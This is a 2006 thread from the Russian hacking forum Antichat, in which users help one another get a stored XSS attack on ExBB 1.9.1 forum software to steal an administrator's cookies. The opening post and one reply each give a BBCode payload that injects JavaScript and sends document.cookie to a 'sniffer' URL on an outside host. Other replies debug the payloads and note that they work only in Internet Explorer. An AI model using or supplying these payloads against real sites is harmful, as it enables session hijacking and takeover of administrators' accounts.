ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Вопрос по применению XSS на форуме ExBB 1.9.1
  #1  
Старый 26.02.2006, 03:31
Аватар для TweakeR
TweakeR
Познающий
Регистрация: 06.02.2006
Сообщений: 46
Провел на форуме:
293626

Репутация: 12
Отправить сообщение для TweakeR с помощью ICQ
По умолчанию Вопрос по применению XSS на форуме ExBB 1.9.1

Пробывал:

Код:
[ email]'style='display:none;background:url(javascript:doc  ument.images[2].src="http://you_sniffer_url/sniffer.php?"+document.cookie)[/email
Админ прочитал а не чё не шлёт!
Что можно придумать подскажите?

Последний раз редактировалось SladerNon; 27.02.2006 в 08:54..
 
Ответить с цитированием

  #2  
Старый 26.02.2006, 03:39
Аватар для tclover
tclover
Banned
Регистрация: 13.12.2005
Сообщений: 1,091
Провел на форуме:
9751364

Репутация: 1847


По умолчанию

а чё так и оставил?

Последний раз редактировалось SladerNon; 27.02.2006 в 08:55..
 
Ответить с цитированием

  #3  
Старый 26.02.2006, 04:55
Аватар для Vovec
Vovec
Новичок
Регистрация: 31.08.2005
Сообщений: 27
Провел на форуме:
50859

Репутация: 3
По умолчанию

А что тебе админ должен прислать=)
Куки должны были тебе слиться, на сниффер который ты указал, если ты это сделал... Только убери пробел между doc и ument и в конце поставь ] ну и конешно путь к сниферу например античатовскому "http://antichat.ru/cgi-bin/s.jpg" Если будет работать то тебе должны будут первыми прийти твои куки если ты там зареген...
 
Ответить с цитированием

  #4  
Старый 26.02.2006, 05:05
Аватар для A110ut
A110ut
Постоянный
Регистрация: 31.12.2005
Сообщений: 605
Провел на форуме:
4349433

Репутация: 661


По умолчанию

лол бывает и такое)
короче вот еще один. используется также как и твой

Код:
[*url]http:/*/sasa'style=background:url("javascript:document.images[0].src='http://antichat.org/s/ТВАЙ_СНИФАК.gif?'+document.cookie");lol:'sa[*/url]
зы: * * * убери

Последний раз редактировалось SladerNon; 27.02.2006 в 08:55..
 
Ответить с цитированием

  #5  
Старый 26.02.2006, 12:11
Аватар для TweakeR
TweakeR
Познающий
Регистрация: 06.02.2006
Сообщений: 46
Провел на форуме:
293626

Репутация: 12
Отправить сообщение для TweakeR с помощью ICQ
По умолчанию

Trampled_clover нет конечно снифер подставил и все пробелы убрал!

Последний раз редактировалось TweakeR; 26.02.2006 в 12:14..
 
Ответить с цитированием

  #6  
Старый 26.02.2006, 12:26
Аватар для Inferno
Inferno
Участник форума
Регистрация: 30.12.2005
Сообщений: 155
Провел на форуме:
2714612

Репутация: 31
По умолчанию

Цитата:
Сообщение от TweakeR  
Trampled_clover нет конечно снифер подставил и все пробелы убрал!
А скобку не закрыл?
 
Ответить с цитированием

  #7  
Старый 26.02.2006, 12:29
Аватар для Tem
Tem
Banned
Регистрация: 05.10.2005
Сообщений: 965
Провел на форуме:
5888800

Репутация: 547


Отправить сообщение для Tem с помощью ICQ
По умолчанию

А может у него не ОСЛИК ? поэтому не шлёт .Если я не ошибаюсь этот XSS только для ИЕ браузера.

Последний раз редактировалось Tem; 26.02.2006 в 12:35..
 
Ответить с цитированием

  #8  
Старый 27.02.2006, 03:08
Аватар для podkashey
podkashey
Познавший АНТИЧАТ
Регистрация: 18.06.2005
Сообщений: 1,004
Провел на форуме:
2821162

Репутация: 1320


По умолчанию

ггыгыгы.... У меня 2 варианта ответа:
1)
Цитата:
А может у него не ОСЛИК
согласен с этим (Ослик - интернет эксплорер).
2) Админ умный и форум пропатчен.
 
Ответить с цитированием

  #9  
Старый 27.02.2006, 03:22
Аватар для Electro
Electro
Участник форума
Регистрация: 23.10.2005
Сообщений: 276
Провел на форуме:
1095453

Репутация: 113
Отправить сообщение для Electro с помощью ICQ
По умолчанию

Цитата:
Сообщение от TweakeR  
Админ прочитал а не чё не шлёт!
Что можно придумать подскажите?
Покажи как выглядит результат скрипта в HTML
 
Ответить с цитированием

  #10  
Старый 28.02.2006, 18:24
Аватар для milord69
milord69
Новичок
Регистрация: 24.11.2005
Сообщений: 18
Провел на форуме:
55564

Репутация: 0
По умолчанию

В 7 ИЕ куки не тырятся
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Вопрос: что делать после сканирования? Тайм Аут Чаты 15 04.03.2006 21:19
ExBB 1.9.1 . PHP-инклюдинг в админке и другие уязвимости. Егорыч+++ Комментарии к видео 7 25.12.2005 13:16
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48
Вопрос про уязвимости в ExBB 1.9.1 Rud Форумы 1 17.09.2005 18:43



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ